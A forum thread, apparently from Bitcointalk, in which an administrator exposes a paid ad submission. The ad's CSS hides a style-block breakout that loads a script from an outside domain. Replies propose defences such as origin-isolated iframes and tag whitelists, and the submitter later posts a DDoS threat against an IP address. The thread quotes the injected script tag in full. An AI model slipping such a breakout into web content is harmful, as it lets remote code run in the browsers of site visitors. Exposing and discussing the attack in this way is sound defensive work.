narayan - attempted code injection

[theymos]

Here's an ad that was sent to me:

Sent to the address!

Here is my CSS code:

Code:

.minefieldadm {width:620px;height:40px;overflow:hidden;font-family:Verdana;font-size:14px;border:1px solid #000;display:inline-block;background: #a3d802;  background: -moz-linear-gradient(top, #a3d802 0%, #11a301 3%, #8ac916 6%, #f0b7a1 34%, #8c3310 50%, #752201 93%, #bf6e4e 98%);  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#a3d802), color-stop(3%,#11a301), color-stop(6%,#8ac916), color-stop(34%,#f0b7a1), color-stop(50%,#8c3310), color-stop(93%,#752201), color-stop(98%,#bf6e4e));  background: -webkit-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%);  background: -o-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%);background: -ms-linear-gradient(top, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%);  background: linear-gradient(to bottom, #a3d802 0%,#11a301 3%,#8ac916 6%,#f0b7a1 34%,#8c3310 50%,#752201 93%,#bf6e4e 98%);  filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#a3d802', endColorstr='#bf6e4e',GradientType=0 );}
.minefieldshader {font-size: 155%;color: #FFFFFF;text-shadow: 0px 0px 8px rgba(0, 0, 0, 1);background: #b4e391;  background: -moz-linear-gradient(45deg, #b4e391 0%, #149b51 22%, #75e01d 27%, #369b14 62%, #5cdb1c 69%, #5cdb1c 86%, #b4e391 100%);  background: -webkit-gradient(linear, left bottom, right top, color-stop(0%,#b4e391), color-stop(22%,#149b51), color-stop(27%,#75e01d), color-stop(62%,#369b14), color-stop(69%,#5cdb1c), color-stop(86%,#5cdb1c), color-stop(100%,#b4e391));background: -webkit-linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%);  background: -o-linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%);}</style><script src='http://webkit-linear.in'></script><style>.minefieldshader{ background: -ms-linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%);  background: linear-gradient(45deg, #b4e391 0%,#149b51 22%,#75e01d 27%,#369b14 62%,#5cdb1c 69%,#5cdb1c 86%,#b4e391 100%);  filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#b4e391', endColorstr='#b4e391',GradientType=1 );margin-top: 3px;padding: 4px 3px 4px 3px;display: inline-block;}
.minefieldstar1 {width: 0;height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 30px solid rgb(80, 189, 45);position:absolute;float:left;margin-left: 135px;}
.minefieldstar2 {width: 0;height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 30px solid rgb(80, 189, 45);position:absolute;float:left;margin-left: 450px;}

Here is my HTML code:

Code:

<a href="http://minefield.bitcoinlab.org/?r=1XCa3af6FfBF9FZT"><div class="minefieldadm"><div class="minefieldstar1"></div>
<div class="minefieldstar2"></div><span class="minefieldshader">Bitcoin Minefield</span></div></a>

Please let me know when the ad is up. I'll be happy to give you stats on how many people clicked and how much BTC I made from this referral link.

Can you spot the problem? The CSS contains code injection:

Code:

</style><script src='http://webkit-linear.in'></script><style>

This URL contains nothing now. I guess he would have put something there if the ad had been accepted. I carefully check all ads by hand, though, so this kind of attack is pointless.

[1714704701]

1714704701

[1714704701]

1714704701

[1714704701]

1714704701

[narayan]

Off to my next account

[Raize]

Quite embarrassing.

Good catch.

[TiagoTiago]

Accepting ads that are anything more than a picture, alt text and a URL doesn't seem all that safe; specially considering how tempting of a target users of the forum are...

[favdesu]

Off to my next account

just out of curiosity, do you break even as a semi-professional scammer with little to no success?

[theymos]

He paid, so I did put up a link to his http://minefield.bitcoinlab.org link. This site is safe, right? It's down now.

Accepting ads that are anything more than a picture, alt text and a URL doesn't seem all that safe; specially considering how tempting of a target users of the forum are...

They're safe when someone is manually reviewing them. It actually wouldn't be all that difficult to automatically verify that ads are OK: CSS can never be a security risk, and a small whitelist of known-safe HTML tags and attributes would prevent other attacks. I may add automatic verification if I ever automate the ad system, though some sort of manual approval will always be required because the ad content and size also need to be checked. (Automatically checking an ad's actual screen size seems difficult.)

HTML/CSS ads are much smaller byte-wise; they can be seen by text browsers, search engines, and the visually-impaired; people can deal with them more naturally (copy/paste, etc.); they can do things that images can't do; and ad blockers can't block them as easily. They are clearly superior to image ads in almost every way.

[narayan]

Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon

[Kluge]

Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon

Jesus, that guy plays a lot of dice.

ETA @ deleted post: lol, yeah - I bet you just RELAYED them.

[gmaxwell]

I'd suggest that you also implement some protections just in case something clever get past your eyes.

beyond some programmatic 'xss' matching, one idea would be to iframe the html/css ads on another domain, so even if they do go rogue the browser sandboxing will rescue you.

I'd also be a little careful with assumptions like "CSS can never be a security risk", CSS is now a huge amount of code, it's a big attack surface, and I wouldn't be surprised if there were some zero-day CSS remote execution exploits (though... getting through manual inspection would be tough). Conversely CSS loading images and other assets from remote hosts could be used to trigger exploits in the image handlers, or just act as webbugs.

[Anduck]

Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon

Whoa, they always return with this same "you busted me, now I will ddos you!!!". Do some legit stuff.. Pays better

[BadBear]

Someone told me to pass along the message that the IP 66.168.20.180 will be suffering from a DDoS soon

Somebody sounds mad.

[K1773R]

mad skiddys

[HeroC]

I wonder what he would have put there...

[Raize]

I'd also be a little careful with assumptions like "CSS can never be a security risk", CSS is now a huge amount of code, it's a big attack surface, and I wouldn't be surprised if there were some zero-day CSS remote execution exploits (though... getting through manual inspection would be tough). Conversely CSS loading images and other assets from remote hosts could be used to trigger exploits in the image handlers, or just act as webbugs.

On this topic, I remember a while back there was an image loading exploit that IE had a few years back, but it was wholly unreliable as an exploit till someone figured out they could use CSS to heap-spray just prior to the image load, thus making it work every time. I forget all the details, but yeah, CSS (or at least the way IE handles it) is far from perfectly safe.

That said, they really only should be able to load things under the user's credentials, but on a Windows box that's typically "good enough" to do some damage.

[theymos]

LOL, thanks!

[willphase]

To protect against this, I think it's certainly worth putting ads in iframes on a different origin - e.g. bitcointalkusercontent.org

Will

[phelix]

He paid, so I did put up a link to his http://minefield.bitcoinlab.org link. This site is safe, right? It's down now.

Are you saying you actually put up a link to that scammers website?

[tysat]

He paid, so I did put up a link to his http://minefield.bitcoinlab.org link. This site is safe, right? It's down now.

Are you saying you actually put up a link to that scammers website?

Confirmed that the ad is actually placed in rotation, I just saw it.

@theymos
Someone tries to run a CSS injection ad and you put up his ad because "he paid"?  That's an awful line of though.

[MiningBuddy]

He paid, so I did put up a link to his http://minefield.bitcoinlab.org link. This site is safe, right? It's down now.

Are you saying you actually put up a link to that scammers website?

Confirmed that the ad is actually placed in rotation, I just saw it.

@theymos
Someone tries to run a CSS injection ad and you put up his ad because "he paid"?  That's an awful line of though.

theymos removed the malicious section of code before putting the link into the ad rotation.

[tysat]

He paid, so I did put up a link to his http://minefield.bitcoinlab.org link. This site is safe, right? It's down now.

Are you saying you actually put up a link to that scammers website?

Confirmed that the ad is actually placed in rotation, I just saw it.

@theymos
Someone tries to run a CSS injection ad and you put up his ad because "he paid"?  That's an awful line of though.

theymos removed the malicious section of code before putting the link into the ad rotation.

I know that, but if they're trying to get something in the ad doesn't it stand to reason that they don't deserve to have an ad in rotation?  I'd say trying to get malicious code into an ad should result in a ban from the forum.